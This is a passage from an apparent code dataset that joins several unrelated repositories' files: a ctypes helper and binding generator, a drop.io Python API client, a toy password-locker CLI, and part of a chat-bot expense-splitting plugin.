st.image(image, caption="Plots from training model")
with col2:
image = Image.open("train_eval2.png")
st.image(image, caption="Plots from training model")
if __name__ == "__main__":
CLASSES = {0 : "Cancer found", 1 : "No cancer"}
model = Model_Class('vgg19_MRI_Baseline_3.h5')
main()
``` |
{
"source": "jimmyorourke/ctypesgen2",
"score": 3
} |
#### File: jimmyorourke/ctypesgen2/ctypes_helpers.py
```python
import ctypes
from typing import Any, Dict
def to_dict(struct: ctypes.Structure) -> Dict[str, Any]:
"""Convert a ctypes.Structure object to a Python dict."""
result = {}
def get_value(field_value):
if hasattr(field_value, "_length_"):
# Probably an array
field_value = get_array(field_value)
elif hasattr(field_value, "_fields_"):
# Probably another struct
field_value = to_dict(field_value)
return field_value
def get_array(array):
# Array might be nested or contain structs
return [get_value(value) for value in array]
# Danger! struct._fields_ may have either 2 or 3 elements!
for field in struct._fields_:
field_name = field[0]
field_value = getattr(struct, field_name)
# field_value will either be the value of a primitive, or the type name of nested type
result[field_name] = get_value(field_value)
return result
# Monkey patch the __str__ member for ctypes.Structure objects to use the stringified dict representation.
# The __dict__ of built-in types is a dictproxy object that is read only, however we are able to get mutable access
# through the garbage collector. This is a higher level and safer method than applying a curse with the forbiddenfruit
# package. It might not be safe to modify the __repr__ of a built-in, so only __str__ is adjusted.
import gc
underlying_dict = gc.get_referents(ctypes.Structure.__dict__)[0]
underlying_dict["__str__"] = lambda self: str(to_dict(self))
```
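A usage sketch of `to_dict` and the patched `ctypes.Structure.__str__`. It assumes the file above is importable as `ctypes_helpers`; the structs are made up for illustration.
```python
import ctypes
from ctypes_helpers import to_dict  # assumed module name; importing it applies the __str__ patch

class Point(ctypes.Structure):
    _fields_ = [("x", ctypes.c_int), ("y", ctypes.c_int)]

class Segment(ctypes.Structure):
    _fields_ = [("start", Point), ("end", Point), ("label", ctypes.c_char * 8)]

seg = Segment(Point(0, 0), Point(3, 4), b"diag")
print(to_dict(seg))  # {'start': {'x': 0, 'y': 0}, 'end': {'x': 3, 'y': 4}, 'label': b'diag'}
print(seg)           # same dict text, via the monkey-patched ctypes.Structure.__str__
```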
#### File: jimmyorourke/ctypesgen2/generate_ctypes.py
```python
import argparse
import os
import sys
if __name__ == "__main__":
parser = argparse.ArgumentParser("Generate Python bindings from C header(s) and dynamic libraries")
parser.add_argument("--libclang-directory", required=False, type=str, help="Directory containing libclang shared object (dylib / so / dll)")
parser.add_argument("--headers", type=str, nargs="+", help="List of C Header(s) to export to Python")
parser.add_argument("--libraries", type=str, nargs="+", help="Libraries to search for exported symbols")
parser.add_argument("--flags", type=str, default="", help="Additional compiler flags to pass to clang")
parser.add_argument("--output", type=str, help="Python wrapper file to generate")
args = parser.parse_args()
# Import Clang Wrapper
# TODO: Is this still true?
# On Windows, PATH is searched for libclang.dll, regardless of clang.cindex.Config, so prepend the Clang library directory to the path to ensure it is found.
if os.name == "nt":
os.environ['PATH'] = args.libclang_directory + os.pathsep + os.environ["PATH"]
import clang.cindex
clang.cindex.Config.set_library_path(args.libclang_directory)
# Import ctypeslib2 Code Generator
import ctypeslib
from ctypeslib.codegen.codegenerator import generate_code
from ctypeslib.codegen import typedesc
from ctypes import CDLL, RTLD_LOCAL
from ctypes.util import find_library
# local library finding
def load_library(name, mode=RTLD_LOCAL):
ret = None
if os.name == "nt":
from ctypes import WinDLL
# WinDLL does demangle the __stdcall names, so use that.
ret = WinDLL(name, mode=mode)
else:
path = find_library(name)
if path is None:
# Maybe 'name' is not a library name in the linker style,
# give CDLL a last chance to find the library.
path = name
ret = CDLL(path, mode=mode)
if ret is None:
raise Exception("Unable to open library %s" % name)
return ret
# Additional available types that we don't translate: Alias, Class, Macro.
# We shouldn't have any aliases or classes in pure C code.
# Enabling macros results in translation issues with the visibility attribute macros when being run as part of the build.
types = (typedesc.Variable,
typedesc.Structure,
typedesc.Enumeration,
typedesc.Function,
typedesc.Structure,
typedesc.Typedef,
typedesc.Union)
with open(args.output, 'w') as output:
generate_code(srcfiles=args.headers, # files to generate python objects from
outfile=output,
expressions=None,
symbols=None,
verbose=True,
generate_comments=False, # get duplicated if a header is included multiple times
known_symbols=None,
searched_dlls=[load_library(d) for d in args.libraries],
types=types,
preloaded_dlls=None,
generate_docstrings=False, # neat but don't seem useful
generate_locations=False,
filter_location=True,
flags=args.flags.split(" ")
)
``` |
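A hedged example of invoking the generator script; every path and library name below is a placeholder.
```python
import subprocess
import sys

# Flags mirror the argparse definitions above; all values are illustrative only.
subprocess.check_call([
    sys.executable, "generate_ctypes.py",
    "--libclang-directory", "/usr/lib/llvm-14/lib",
    "--headers", "include/mylib.h",
    "--libraries", "build/libmylib.so",
    "--flags", "-Iinclude",
    "--output", "mylib_bindings.py",
])
```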
{
"source": "jimmyorr/dropio-api-python",
"score": 3
} |
#### File: src/dropio/client.py
```python
__version__ = '0.1.1'
import httplib
import logging
import mimetypes
import mimetools
import os.path
import sys
import urllib
import urllib2
import uuid
from optparse import OptionParser
from urlparse import urlsplit
try:
import json
except ImportError:
import simplejson as json
from dropio.resource import Asset, Drop, Link, Note
_API_VERSION = '2.0'
_API_FORMAT = 'json'
_API_BASE_URL = 'http://api.drop.io/'
_FILE_UPLOAD_URL = 'http://assets.drop.io/upload'
_DROPS = 'drops/'
_ASSETS = '/assets/'
_COMMENTS = '/comments/'
_SEND_TO = '/send_to'
_DROPIO_TRUE = 'true'
_DROPIO_FALSE = 'false'
#########################################################################
# HTTP ERRORS: from http://dev.drop.io/rest-api-reference/response-codes/
#
# TODO: consider having these inherit from urllib2.HTTPError
#########################################################################
class Error(Exception):
pass
class BadRequestError(Error):
"""400 Bad Request
Something is wrong with the request in general (i.e. missing parameters,
bad data, etc).
"""
pass
class InternalServerError(Error):
"""500 Internal Server Error
Something that [drop.io] did not account for has gone wrong.
"""
pass
class ForbiddenError(Error):
"""403 Forbidden
You did not supply a valid API token or an authorization token.
"""
pass
class ResourceNotFoundError(Error):
"""404 Not Found
The resource requested is not found or not available.
"""
pass
class ExpirationLengthEnum(object):
ONE_DAY_FROM_NOW = '1_DAY_FROM_NOW'
ONE_WEEK_FROM_NOW = '1_WEEK_FROM_NOW'
ONE_MONTH_FROM_NOW = '1_MONTH_FROM_NOW'
ONE_YEAR_FROM_NOW = '1_YEAR_FROM_NOW'
ONE_DAY_FROM_LAST_VIEW = '1_DAY_FROM_LAST_VIEW'
ONE_WEEK_FROM_LAST_VIEW = '1_WEEK_FROM_LAST_VIEW'
ONE_MONTH_FROM_LAST_VIEW = '1_MONTH_FROM_LAST_VIEW'
ONE_YEAR_FROM_LAST_VIEW = '1_YEAR_FROM_LAST_VIEW'
valid_expiration_lengths = frozenset((
ONE_DAY_FROM_NOW,
ONE_WEEK_FROM_NOW,
ONE_MONTH_FROM_NOW,
ONE_YEAR_FROM_NOW,
ONE_DAY_FROM_LAST_VIEW,
ONE_WEEK_FROM_LAST_VIEW,
ONE_MONTH_FROM_LAST_VIEW,
ONE_YEAR_FROM_LAST_VIEW))
class _NullHandler(logging.Handler):
"""default logger does nothing"""
def emit(self, record):
pass
class DropIoClient(object):
"""Client for the Drop.io service."""
def __init__(self, api_key, logger=None):
self.__base_params_dict = {}
self.__base_params_dict['api_key'] = api_key
self.__base_params_dict['version'] = _API_VERSION
self.__base_params_dict['format'] = _API_FORMAT
if logger:
self.logger = logger
else:
handler = _NullHandler()
self.logger = logging.getLogger()
self.logger.addHandler(handler)
def __get(self, base_url, params_dict):
params = urllib.urlencode(params_dict)
stream = urllib2.urlopen(base_url + '?' + params)
body_dict = json.load(stream)
stream.close()
return body_dict
def __post(self, url, params_dict):
params = urllib.urlencode(params_dict)
stream = urllib2.urlopen(url, params)
body_dict = json.load(stream)
stream.close()
return body_dict
def __post_multipart(self, url, params_dict):
def encode_multipart_formdata(params_dict):
boundary = mimetools.choose_boundary()
body = ''
for key, value in params_dict.iteritems():
if isinstance(value, tuple):
filename, value = value
body += '--%s\r\n' % boundary
body += 'Content-Disposition: form-data;'
body += 'name="%s";' % str(key)
body += 'filename="%s"\r\n' % str(filename)
body += 'Content-Type: %s\r\n\r\n' % str(get_content_type(filename))
body += '%s\r\n' % str(value)
else:
body += '--%s\r\n' % boundary
body += 'Content-Disposition: form-data; name="%s"\r\n\r\n' % str(key)
body += '%s\r\n' % str(value)
body += '--%s--\r\n' % boundary
content_type = 'multipart/form-data; boundary=%s' % boundary
return body, content_type
def get_content_type(filename):
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
body, content_type = encode_multipart_formdata(params_dict)
headers = {'content-type': content_type}
url_parts = urlsplit(url)
connection = httplib.HTTPConnection(url_parts.netloc)
connection.request('POST', url_parts.path, body, headers)
response = connection.getresponse()
body_dict = json.load(response)
connection.close()
return body_dict
def __put(self, url, params_dict):
opener = urllib2.build_opener(urllib2.HTTPHandler)
request = urllib2.Request(url, data=json.dumps(params_dict))
request.add_header('Content-Type', 'application/json')
request.get_method = lambda: 'PUT'
stream = opener.open(request)
body_dict = json.load(stream)
stream.close()
opener.close()
return body_dict
def __delete(self, url, params_dict):
opener = urllib2.build_opener(urllib2.HTTPHandler)
request = urllib2.Request(url, data=json.dumps(params_dict))
request.add_header('Content-Type', 'application/json')
request.get_method = lambda: 'DELETE'
stream = opener.open(request)
body_dict = json.load(stream)
stream.close()
opener.close()
return body_dict
def __asset_dict_to_asset(self, asset_dict):
asset = None
if 'contents' in asset_dict:
asset = Note(asset_dict)
elif 'url' in asset_dict:
asset = Link(asset_dict)
else:
asset = Asset(asset_dict)
return asset
################
# DROP RESOURCE
################
def create_drop(self, drop_name=None):
"""
Returns:
dropio.resource.Drop
"""
params_dict = {}
if drop_name:
params_dict['name'] = drop_name
params_dict.update(self.__base_params_dict)
url = _API_BASE_URL + _DROPS
drop_dict = self.__post(url, params_dict)
drop = Drop(drop_dict)
return drop
def get_drop(self, drop_name, token=None):
"""
Returns:
dropio.resource.Drop
"""
assert drop_name
params_dict = {}
if token:
params_dict['token'] = token
params_dict.update(self.__base_params_dict)
url = _API_BASE_URL + _DROPS + drop_name
try:
drop_dict = self.__get(url, params_dict)
except urllib2.HTTPError, error:
# TODO: move this into reusable method
if error.code == 400:
raise BadRequestError()
elif error.code == 403:
raise ForbiddenError()
elif error.code == 404:
raise ResourceNotFoundError()
elif error.code == 500:
raise InternalServerError()
else:
raise error
drop = Drop(drop_dict)
return drop
def update_drop(self, drop, token):
"""
Returns:
dropio.resource.Drop
"""
assert drop
assert token
params_dict = {}
params_dict['token'] = token
if drop.guests_can_comment is not None:
if drop.guests_can_comment:
params_dict['guests_can_comment'] = _DROPIO_TRUE
else:
params_dict['guests_can_comment'] = _DROPIO_FALSE
if drop.guests_can_add is not None:
if drop.guests_can_add:
params_dict['guests_can_add'] = _DROPIO_TRUE
else:
params_dict['guests_can_add'] = _DROPIO_FALSE
if drop.guests_can_delete is not None:
if drop.guests_can_delete:
params_dict['guests_can_delete'] = _DROPIO_TRUE
else:
params_dict['guests_can_delete'] = _DROPIO_FALSE
if drop.expiration_length:
params_dict['expiration_length'] = drop.expiration_length
if drop.password:
params_dict['password'] = <PASSWORD>
if drop.admin_password:
params_dict['admin_password'] = <PASSWORD>
params_dict.update(self.__base_params_dict)
url = _API_BASE_URL + _DROPS + drop.name
drop_dict = self.__put(url, params_dict)
drop = Drop(drop_dict)
return drop
def delete_drop(self, drop_name, token):
assert drop_name
assert token
params_dict = {}
params_dict['token'] = token
params_dict.update(self.__base_params_dict)
url = _API_BASE_URL + _DROPS + drop_name
self.__delete(url, params_dict)
return
#################
# ASSET RESOURCE
#################
def create_link(self, drop_name, link_url,
title=None, description=None, token=None):
"""
Returns:
dropio.resource.Link
"""
assert drop_name
assert link_url
params_dict = {}
params_dict['url'] = link_url
if title:
params_dict['title'] = title
if description:
params_dict['description'] = description
if token:
params_dict['token'] = token
params_dict.update(self.__base_params_dict)
url = _API_BASE_URL + _DROPS + drop_name + _ASSETS
link_dict = self.__post(url, params_dict)
link = Link(link_dict)
return link
def create_note(self, drop_name, contents, title=None, token=None):
"""
Returns:
dropio.resource.Note
"""
assert drop_name
assert contents
params_dict = {}
params_dict['contents'] = contents
if title:
params_dict['title'] = title
if token:
params_dict['token'] = token
params_dict.update(self.__base_params_dict)
url = _API_BASE_URL + _DROPS + drop_name + _ASSETS
note_dict = self.__post(url, params_dict)
note = Note(note_dict)
return note
def create_file_from_readable(self, drop_name, readable, file_name=None, token=None):
"""
Returns:
dropio.resource.Asset
"""
assert drop_name
assert hasattr(readable, 'read')
file_name = file_name or str(uuid.uuid4())
params_dict = {}
params_dict['drop_name'] = drop_name
if token:
params_dict['token'] = token
params_dict['file'] = (file_name, readable.read())
params_dict.update(self.__base_params_dict)
url = _FILE_UPLOAD_URL
asset_dict = self.__post_multipart(url, params_dict)
asset = Asset(asset_dict)
return asset
def create_file(self, drop_name, file_name, token=None):
"""
Returns:
dropio.resource.Asset
"""
assert drop_name
assert file_name
assert os.path.isfile(file_name)
stream = open(file_name, 'rb')
asset = self.create_file_from_readable(drop_name, stream, file_name, token)
stream.close()
return asset
def get_asset_list(self, drop_name, page=1, token=None):
"""
Returns:
generator of dropio.resource.Asset
"""
assert drop_name
params_dict = {}
params_dict['page'] = page
if token:
params_dict['token'] = token
params_dict.update(self.__base_params_dict)
url = _API_BASE_URL + _DROPS + drop_name + _ASSETS
response = self.__get(url, params_dict)
for asset_dict in response['assets']:
yield Asset(asset_dict)
return
def get_all_asset_list(self, drop_name, token=None):
"""
Returns:
generator of dropio.resource.Asset
"""
assert drop_name
page = 1
while True:
assets = self.get_asset_list(drop_name, page, token)
empty = True
for asset in assets:
yield asset
empty = False
if empty:
break
page += 1
return
def get_asset(self, drop_name, asset_name, token=None):
"""
Returns:
dropio.resource.Asset
"""
assert drop_name
assert asset_name
params_dict = {}
if token:
params_dict['token'] = token
params_dict.update(self.__base_params_dict)
url = _API_BASE_URL + _DROPS + drop_name + _ASSETS + asset_name
asset_dict = self.__get(url, params_dict)
asset = self.__asset_dict_to_asset(asset_dict)
return asset
def update_asset(self, drop_name, asset, token=None):
"""
Returns:
dropio.resource.Asset
"""
assert drop_name
assert asset
params_dict = {}
if token:
params_dict['token'] = token
if asset.title:
params_dict['title'] = asset.title
if asset.description:
params_dict['description'] = asset.description
if hasattr(asset, 'url') and asset.url:
params_dict['url'] = asset.url
if hasattr(asset, 'contents') and asset.contents:
params_dict['contents'] = asset.contents
params_dict.update(self.__base_params_dict)
url = _API_BASE_URL + _DROPS + drop_name + _ASSETS + asset.name
asset_dict = self.__put(url, params_dict)
asset = self.__asset_dict_to_asset(asset_dict)
return asset
def delete_asset(self, drop_name, asset_name, token=None):
assert drop_name
assert asset_name
params_dict = {}
if token:
params_dict['token'] = token
params_dict.update(self.__base_params_dict)
url = _API_BASE_URL + _DROPS + drop_name + _ASSETS + asset_name
self.__delete(url, params_dict)
return
def __send_asset(self, drop_name, asset_name, medium, params_dict, token=None):
assert drop_name
assert asset_name
params_dict['medium'] = medium
if token:
params_dict['token'] = token
params_dict.update(self.__base_params_dict)
url = _API_BASE_URL + _DROPS + drop_name + _ASSETS + asset_name + _SEND_TO
self.__post(url, params_dict)
return
def send_asset_to_fax(self, drop_name, asset_name, fax_number, token=None):
assert fax_number
params_dict = {}
params_dict['fax_number'] = fax_number
self.__send_asset(drop_name, asset_name, 'fax', params_dict, token)
return
def send_asset_to_drop(self, drop_name, asset_name, drop_name_dest, token=None):
assert drop_name_dest
params_dict = {}
params_dict['drop_name'] = drop_name_dest
self.__send_asset(drop_name, asset_name, 'drop', params_dict, token)
return
def send_asset_to_email(self, drop_name, asset_name, emails, message=None, token=None):
assert emails
params_dict = {}
params_dict['emails'] = emails
if message:
params_dict['message'] = message
self.__send_asset(drop_name, asset_name, 'email', params_dict, token)
return
###################
# COMMENT RESOURCE
###################
def get_comment_list(self, drop_name, asset_name, token=None):
"""
Returns:
list of dropio.resource.Comment
"""
# TODO: implement me
raise NotImplementedError()
def create_comment(self, drop_name, asset_name, contents, token=None):
"""
Returns:
dropio.resource.Comment
"""
# TODO: implement me
raise NotImplementedError()
def get_comment(self, drop_name, asset_name, comment_id, token=None):
"""
Returns:
dropio.resource.Comment
"""
# TODO: implement me
raise NotImplementedError()
def update_comment(self, drop_name, asset_name, comment, token):
"""
Returns:
dropio.resource.Comment
"""
# TODO: implement me
raise NotImplementedError()
def delete_comment(self, drop_name, asset_name, comment_id, token):
"""
Returns:
???
"""
# TODO: implement me
raise NotImplementedError()
def main(argv=None):
usage = "usage: %prog [options]"
parser = OptionParser(usage, version="%prog " + __version__)
parser.set_defaults(api_key=None,
verbosity=0,
drop_name=None,
token=None,
files_to_create=[],
links_to_create=[],
notes_to_create=[])
parser.add_option("-k", "--key",
action="store", dest="api_key", metavar="API_KEY",
help="REQUIRED! get key from http://api.drop.io/")
parser.add_option("-v", "--verbose",
action="count", dest="verbosity")
parser.add_option("-d", "--drop_name",
action="store", dest="drop_name", metavar="DROP")
parser.add_option("-t", "--token",
action="store", dest="token", metavar="TOKEN")
parser.add_option("-f", "--file",
action="append", dest="files_to_create", metavar="FILE",
help="Use a single dash '-' to read from stdin")
parser.add_option("-l", "--link",
action="append", dest="links_to_create", metavar="LINK")
parser.add_option("-n", "--note",
action="append", dest="notes_to_create", metavar="NOTE")
(options, unused_args) = parser.parse_args()
if options.api_key is None:
        print(parser.expand_prog_name("%prog: --key is a required option"))
        print(parser.expand_prog_name("Try `%prog --help' for more information."))
return 1
logger = logging.getLogger()
logging_level = logging.WARNING - (options.verbosity * 10)
logger.setLevel(logging_level)
handler = logging.StreamHandler()
handler.setLevel(logging_level)
logger.addHandler(handler)
client = DropIoClient(options.api_key, logger)
try:
drop = client.get_drop(options.drop_name, options.token)
except Exception: # TODO: fix diaper anti-pattern
drop = client.create_drop(options.drop_name)
for file_to_create in options.files_to_create:
logger.info("Adding file %s to drop %s" % (file_to_create, drop.name))
if file_to_create == '-':
client.create_file_from_readable(drop.name, sys.stdin, token=options.token)
else:
client.create_file(drop.name, file_to_create, options.token)
for link_to_create in options.links_to_create:
logger.info("Adding link '%s' to drop %s" % (link_to_create, drop.name))
        client.create_link(drop.name, link_to_create, token=options.token)
for note_to_create in options.notes_to_create:
logger.info("Adding %s to drop %s" % (note_to_create, drop.name))
        client.create_note(drop.name, note_to_create, token=options.token)
return 0
if __name__ == "__main__":
sys.exit(main())
``` |
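A hedged usage sketch of the client defined above. The API key, drop name, and import path are placeholders (assumptions), and the drop.io service itself is long defunct, so this is illustrative only.

```python
# Hypothetical usage of DropIoClient; assumes the module above is importable,
# e.g. as dropio.client, and that 'YOUR_API_KEY' is replaced with a real key.
import logging
from dropio.client import DropIoClient

client = DropIoClient('YOUR_API_KEY', logging.getLogger())
drop = client.create_drop('example-drop')
client.create_note(drop.name, 'hello from the API', title='greeting')
for asset in client.get_all_asset_list(drop.name):
    print(asset)
```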
{
"source": "jimmy-oss/password-locker",
"score": 4
} |
#### File: jimmy-oss/password-locker/run.py
```python
from user import user
def create_account(fname,p_number):
'''
Function to create a new account
'''
new_user = user(fname,p_number)
return new_user
def save_user(user):
'''
Function to save account
'''
user.save_user()
def confirm_password(account):
'''
Function to confirm password
'''
user.confirm_password(account)
def default_user_name(f_name):
'''
function for a default user password
'''
user.default_user_name(f_name)
def del_account():
'''
Function to delete a account
'''
user.delete_user()
def find_contact(account):
'''
Function that finds an account by name and returns the account searched
'''
    return user.find_by_password(account)
def check_existing_account(account):
'''
Function that check if account exists with that number and return a Boolean
'''
return user.find_by_password(account)
def display_users():
'''
Function that returns all the saved contacts
'''
return user.display_users()
def copy_password():
'''
Function that copy pastes users password
'''
return user.copy_password()
def main():
print("Hello Welcome to password locker. What is your username?")
user_name = input()
print(f"Hello {user_name}. what would you like to do?")
print('\n')
while True:
print("Use these short codes : cc - create a new contact,lg - login into an account dc - display contacts, fc -find an account, ex -exit the password locker ")
short_code = input().lower()
if short_code == 'cc':
print("New Account")
print("-"*10)
print ("Your username ....")
f_name = input()
print("Password ...")
p_number = input()
print("confirm your password ....")
p_number = input()
save_user(create_account(f_name,p_number)) # create and save new account.
print(f"You have successfully created a new {f_name} {p_number} account!!")
print ('\n')
elif short_code == 'lg':
print("Welcome")
print("Enter username")
f_name= input()
print("Enter password")
p_number=input()
print ('\n')
save_user(create_account(f_name,p_number)) # create and save new account.
print(f"Welcome to your password locker {f_name} {p_number} account!!")
print ('\n')
elif short_code == 'dc':
if display_users():
print("Here is a list of all your accounts")
print('\n')
for user in display_users():
print(f"{f_name} {p_number}")
print('\n')
else:
print('\n')
print("You don't seem to have any account saved yet create a new account!")
print('\n')
elif short_code == 'fc':
print("Enter the account you want to search for")
search_contact = input()
if check_existing_account(search_contact):
search_contact = find_contact(search_contact)
print(f"{search_contact.f_name}")
print('-' * 20)
print(f"username.......{search_contact.f_name}")
else:
print("That contact does not exist")
elif short_code == "ex":
print(" You have successfully exited in your account Bye .......")
break
else:
print("I really didn't get that. Please use the valid short codes command!")
if __name__ == '__main__':
main()
```
#### File: jimmy-oss/password-locker/user.py
```python
class user():
"""
Class that generates new instances of contacts.
"""
User_list = [] # Empty contact list
def __init__(self,username,password):
# docstring removed for simplicity
self.first_name= username
self.password= password
# Init method up here
def save_user(self):
'''
save_user method saves user objects into user_list
'''
user.User_list.append(self)
def delete_user(self):
'''
delete_user method deletes a saved user from the User_list
'''
user.User_list.remove(self)
@classmethod
def find_by_password(cls,number):
'''
Method that takes in a password and returns a user that matches that password.
Args:
number: password to search for
Returns :
user of person that matches the password.
'''
for user in cls.User_list:
if user.password == number:
return user
@classmethod
def user_exist(cls,number):
'''
Method that checks if a user exists from the user list.
Args:
number: Password to search if it exists
Returns :
Boolean: True or false depending if the user exists
'''
for user in cls.User_list:
if user.password == number:
return True
return False
@classmethod
def display_users(cls):
'''
method that returns the User list
'''
return cls.User_list
``` |
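A brief illustrative sketch of how the `user` class above behaves; the names and passwords are made up, and it assumes `user.py` is on the import path.

```python
# Illustrative use of the user class defined above.
from user import user

alice = user("alice", "s3cret")
alice.save_user()
print(user.user_exist("s3cret"))                    # True
print(user.find_by_password("s3cret").first_name)   # alice
print(len(user.display_users()))                    # 1
```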
{
"source": "JimmyPesto/nio-smith",
"score": 3
} |
#### File: plugins/cashup/cashup.py
```python
from types import AsyncGeneratorType
from typing import Match
from core.plugin import Plugin
import logging
# importing cash up stuff
# functools for reduce()
import functools
# importing regular expressions for parsing numbers
import re
logger = logging.getLogger(__name__)
plugin = Plugin("cashup", "General", "A very simple cashup plugin to share expenses in a group")
def setup():
# first command will be called when plugin name is called
plugin.add_command(
"cashup-register",
register,
"Resets existing room DB and initializes all group members for sharing expenses.",
power_level=100,
)
plugin.add_command(
"cashup-add-expense",
add_expense_for_user,
"Adds a new expense for the given user-name.",
)
plugin.add_command("cashup-print", print_room_state, "debug print function")
plugin.add_command(
"cashup",
cash_up,
"Settle all recorded expenses among the previously registered group.",
power_level=50,
)
plugin.add_command("cashup-ae", add_expense_for_user, "Short form for `cashup-add-expense`")
plugin.add_command("cashup-p", print_room_state, "Short form for `cashup-print`")
# TODO shorter - smartphone friendly naming
"""Defining a configuration values to be expected in the plugin's configuration file and reading the value
Defines a currency_sign used for a nice output message
"""
plugin.add_config("currency_sign", "€", is_required=True)
def clean_print_currency(value):
clean_currency: str = "{:.2f}".format(value)
config_currency_sign: str = plugin.read_config("currency_sign")
clean_currency += config_currency_sign
return clean_currency
class GroupPayments:
def __init__(self, splits_evenly: bool = False):
"""Setup Group_payments instance
Represents a group of people that want to share expenses.
payments is an array of dict in the format
that Cash_up class consumes
each dict contains:
* uid - user name
* expenses - the sum of all expenses spend
            * [percentage] - optionally the percentage of the
              overall cost this person is going to pay
Args:
splits_evenly (bool)
defines if the group splits all expenses
                evenly or every member pays a certain
                percentage of the overall cost
"""
self.payments = []
self.splits_evenly = splits_evenly
def append_new_member(self, new_uid: str, new_percentage: float = None):
"""Adds a new member to this group
throws ValueError when percentage value is demanded but not given.
Args:
new_uid (str): the new user name to be added
[new_percentage] (float): optional the percentage this person is going to pay"""
new_member = {}
if self.splits_evenly == False:
            # group is defined as not splitting evenly
if new_percentage is not None:
# and a percentage value is given
new_member = {
"uid": new_uid,
"percentage": new_percentage,
"expenses": 0,
}
else:
# percentage value is demanded but not given
error_msg = "cashup Group_payments append_new_member failed: members percentage is not defined for a group that does not split evenly"
logger.error(error_msg)
raise ValueError(error_msg, new_member)
else:
# group splits expenses evenly
new_member = {"uid": new_uid, "expenses": 0}
# store new member in groups list
self.payments.append(new_member)
def reset_all_expenses(self):
"""Sets all expenses to 0 for every group member.
        Attention: all previously captured expenses are lost!!!"""
for payment in self.payments:
payment["expenses"] = 0
def increase_expense(self, search_uid, new_expense: float):
"""Increases the current expenses of user with name search_uid
by the given new_expense
Args:
            search_uid (str): user name whose expenses will be increased
new_expense (float): the new expense that will be added
"""
# find all payments where uid matches
payment_to_increase = list(filter(lambda payment: payment["uid"] == search_uid, self.payments))
# update first and hopefully only match
# throws IndexError when search_uid not found
payment_to_increase[0]["expenses"] += new_expense
def __str__(self):
"""Simple function to get a human readable string of this groups state"""
group_str: str = f"**Group**: splits_evenly: {self.splits_evenly}, \n"
for payment in self.payments:
name = payment["uid"]
expense = payment["expenses"]
group_str += f"{name} spend {clean_print_currency(expense)}"
if self.splits_evenly == False:
percentage = payment["percentage"] * 100
group_str += f" and will pay {percentage}% of the over all cost \n"
else:
group_str += f" \n"
return group_str
class PersistentGroups:
"""Setup Persistent_groups instance
Simple wrapper for persisting groups in some kind of data base
Args:
store
The object used to interact with the database
"""
def __init__(self, store):
self.store = store
async def delete_group(self, search_room_id: str):
# delete group if exists
return await self.store.clear_data(search_room_id)
async def load_group(self, search_room_id: str):
return await self.store.read_data(search_room_id)
async def save_group(self, room_id: str, group_to_save: GroupPayments):
return await self.store.store_data(room_id, group_to_save)
pg = PersistentGroups(plugin)
class Cashup:
def __init__(self, group: GroupPayments):
"""Setup Cash_up algorithm
For a set of people who owe each other some money or none
this algorithm can settle expense among this group.
        Optionally it can be specified what percentage of
        the overall expenses should be paid by each person.
If not specified the expenses are distributed equally.
Args:
            group (GroupPayments): Object representing a group's
expenses and how they want to split these
"""
self._split_uneven = not group.splits_evenly
self._payments = group.payments
def distribute_expenses(self):
"""distribute the given expenses within the group
and return who owes who texts
returns: (array of str)
Text elements per payment to
settle expense among the group."""
self._calculate_sum_and_mean_group_expenses()
self._calculate_parts_to_pay()
return self._who_owes_who()
def _calculate_sum_and_mean_group_expenses(self):
"""calculate the sum & mean of all expenses in the group"""
        self._sum_group_expenses = functools.reduce(lambda acc, curr: acc + float(curr["expenses"]), self._payments, 0)
self._mean_group_expenses = self._sum_group_expenses / len(self._payments)
def _calculate_parts_to_pay(self):
"""calculate the parts each person has to pay
depending on _split_uneven or not"""
if self._split_uneven:
self._parts_to_pay = [
{
"uid": payment["uid"],
"has_to_pay": (payment["expenses"] - (self._sum_group_expenses * payment["percentage"])),
}
for payment in self._payments
]
else:
self._parts_to_pay = [
{
"uid": payment["uid"],
"has_to_pay": (payment["expenses"] - (self._mean_group_expenses)),
}
for payment in self._payments
]
def _who_owes_who(self):
"""Build strings of who owes who how much.
Source is the JavaScript version found at:
https://stackoverflow.com/questions/974922/algorithm-to-share-settle-expenses-among-a-group
returns:
output_texts: (array of str)
Text elements per payment to
settle expense among the group."""
        # sort balances ascending: biggest debtors first, biggest creditors last
ordered_parts_to_pay = sorted(self._parts_to_pay, key=lambda d: d["has_to_pay"])
sortedPeople = [part["uid"] for part in ordered_parts_to_pay]
sortedValuesPaid = [part["has_to_pay"] for part in ordered_parts_to_pay]
i = 0
j = len(sortedPeople) - 1
debt = 0
output_texts = []
while i < j:
debt = min(-(sortedValuesPaid[i]), sortedValuesPaid[j])
sortedValuesPaid[i] += debt
sortedValuesPaid[j] -= debt
# generate output string
if debt != 0.0:
new_text = str(sortedPeople[i]) + " owes " + str(sortedPeople[j]) + " " + clean_print_currency(debt)
output_texts.append(new_text)
if sortedValuesPaid[i] == 0:
i += 1
if sortedValuesPaid[j] == 0:
j -= 1
return output_texts
async def register(command):
"""Register a set of people as a new group to share expenses"""
response_input_error = (
f"You need to register at least two users: \n"
"`cashup-register <user-name1> [<user1-percentage>]; <user-name2> [<user2-percentage>]; ...` [optional] \n"
"examples: \n"
"`cashup-register A 0.2; B 0.8;` A pays 20%, B pays 80% or `cashup-register A; B;` to split expenses evenly"
)
# if there is a group registered for this room already
# run a cashup so old data will be shown to the users
# before deleting it
previously_persisted_group: GroupPayments = await pg.load_group(command.room.room_id)
if previously_persisted_group is not None:
await plugin.respond_notice(
command,
"There is already a group registered for this room. " "I will do a quick cashup so no data will be lost when registering the new group.",
)
await cash_up(command)
if command.args:
logger.debug(f"cashup-register called with {command.args}")
# cashup-register called with ['Marius', '0,7;', 'Andrea', '0.3;']
# cashup-register called with ['Marius;', 'Andrea;']
# generate lists of names and optional percentages
new_names = []
new_percentages = []
for arg in command.args:
# remove all ; from arg element;
arg = arg.replace(";", "")
# find any numbers in string (eg: 12; 12,1; 12.1)
match_arg_nr = re.search("\d*[.,]?\d+", arg)
# returns a match object
if match_arg_nr:
# number (as string) found
# replace "," of german numbers by a "." decimal point
# convert the number to a real float number
arg_float = float(match_arg_nr.group().replace(",", "."))
if len(new_percentages) == (len(new_names) - 1):
new_percentages.append(arg_float)
else:
await plugin.respond_notice(command, response_input_error)
return
else:
new_names.append(arg)
if len(new_names) == len(new_percentages) and len(new_names) > 1:
# every name got a percentage value
new_group_not_even = GroupPayments(splits_evenly=False)
for idx, name in enumerate(new_names):
# create a new group member with split percentage
new_group_not_even.append_new_member(name, new_percentages[idx])
# persist new group for current room id
await pg.save_group(command.room.room_id, new_group_not_even)
